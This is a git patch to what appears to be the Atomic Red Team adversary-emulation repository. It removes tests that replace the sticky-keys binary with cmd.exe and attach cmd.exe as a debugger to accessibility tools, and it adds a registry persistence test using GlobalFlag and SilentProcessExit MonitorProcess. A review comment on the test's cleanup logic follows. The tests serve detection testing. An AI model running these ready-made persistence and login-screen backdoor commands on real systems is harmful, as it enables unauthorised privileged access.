From 5067af06348b93415e347c65a2622ef459cdfeb8 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Fri, 9 Sep 2022 14:26:40 -0600
Subject: [PATCH] Added new T1546.012 (#2134)
* Update T1546.008.yaml
- https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html
- https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit
* Update T1546.012.yaml
Added the same test but written in PowerShell.
* Delete T1546.008.yaml
Co-authored-by: Carrie Roberts
---
 atomics/T1546.008/T1546.008.yaml | 65 --------------------------------
 atomics/T1546.012/T1546.012.yaml | 42 +++++++++++++++++++++
 2 files changed, 42 insertions(+), 65 deletions(-)
 delete mode 100644 atomics/T1546.008/T1546.008.yaml
diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml
deleted file mode 100644
index fda9c6b0..00000000
--- a/atomics/T1546.008/T1546.008.yaml
+++ /dev/null
@@ -1,65 +0,0 @@
-attack_technique: T1546.008
-display_name: 'Event Triggered Execution: Accessibility Features'
-atomic_tests:
-- name: Attaches Command Prompt as a Debugger to a List of Target Processes
- auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
- description: |
- Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
-
- Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
- supported_platforms:
- - windows
- input_arguments:
- parent_list:
- description: |
- Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe"
- type: String
- default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe
- attached_process:
- description: |
- Full path to process to attach to target in #{parent_list}. Default: cmd.exe
- type: Path
- default: C:\windows\system32\cmd.exe
- executor:
- command: |
- $input_table = "#{parent_list}".split(",")
- $Name = "Debugger"
- $Value = "#{attached_process}"
- Foreach ($item in $input_table){
- $item = $item.trim()
- $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
- IF(!(Test-Path $registryPath))
- {
- New-Item -Path $registryPath -Force
- New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
- }
- ELSE
- {
- New-ItemProperty -Path $registryPath -Name $name -Value $Value
- }
- }
- cleanup_command: |
- $input_table = "#{parent_list}".split(",")
- Foreach ($item in $input_table)
- {
- $item = $item.trim()
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null
- }
- name: powershell
- elevation_required: true
-- name: Replace binary of sticky keys
- auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
- description: |
- Replace sticky keys binary (sethc.exe) with cmd.exe
- supported_platforms:
- - windows
- executor:
- command: |
- copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
- takeown /F C:\Windows\System32\sethc.exe /A
- icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
- copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
- cleanup_command: |
- copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
- name: command_prompt
- elevation_required: true
diff --git a/atomics/T1546.012/T1546.012.yaml b/atomics/T1546.012/T1546.012.yaml
index 6c8644e7..0c877d11 100644
--- a/atomics/T1546.012/T1546.012.yaml
+++ b/atomics/T1546.012/T1546.012.yaml
@@ -48,4 +48,46 @@ atomic_tests:
 reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1
 reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1
 name: command_prompt
+ elevation_required: true
+- name: GlobalFlags in Image File Execution Options
+ description: |
+ The following Atomic Test will create a GlobalFlag key under Image File Execution Options, also a SilentProcessExit Key with ReportingMode and MonitorProcess values. This test is similar to a recent CanaryToken that will generate an EventCode 3000 in the Application log when a command, whoami.exe for example, is executed.
+ Upon running Whoami.exe, a command shell will spawn and start calc.exe based on the MonitorProcess value.
+ Upon successful execution, powershell will modify the registry and spawn calc.exe. An event 3000 will generate in the Application log.
+ supported_platforms:
+ - windows
+ input_arguments:
+ process:
+ description: |
+ Process to monitor
+ type: String
+ default: whoami.exe
+ cmd_to_run:
+ description: |
+ Command to execute
+ type: String
+ default: cmd.exe /c calc.exe
+ executor:
+ command: |
+ $Name = "GlobalFlag"
+ $Value = "512"
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}"
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $Name -Value $Value -PropertyType DWord -Force
+ $Name = "ReportingMode"
+ $Value = "1"
+ $SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}"
+ New-Item -Path $SilentProcessExit -Force
+ New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType DWord -Force
+
+ $Name = "MonitorProcess"
+ $Value = "#{cmd_to_run}"
+ New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType String -Force
+ Start-Process whoami.exe
+ cleanup_command: |
+ $SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}"
+ Remove-Item $SilentProcessExit -force
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}"
+ Remove-Item $registryPath -force
+ name: powershell
 elevation_required: true
\ No newline at end of file
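Review bot: `Start-Process whoami.exe` at the end of the new `command:` block hard-codes the trigger even though the monitored binary is the `process` input argument, so a run with a non-default `process` writes the GlobalFlag and SilentProcessExit keys for that binary but never launches it and the EventCode 3000 the description promises never appears; it should read `Start-Process "#{process}"`, and the description's "Upon running Whoami.exe" sentence should be phrased in terms of `#{process}` as well. The cleanup_command then deletes the whole `Image File Execution Options\#{process}` key rather than only the `GlobalFlag` value the test added, which would also discard any values that key held before the test ran; `Remove-ItemProperty -Path $registryPath -Name GlobalFlag -Force` would mirror the narrower `reg delete ... /v Debugger` cleanup of the T1546.008 test this commit removes. Both `Remove-Item ... -force` calls also raise an error when the key is already absent, so cleanup is not safely re-runnable; adding `-ErrorAction SilentlyContinue` would match the `>nul 2>&1` suppression the preceding test in this file uses on its `reg delete` lines.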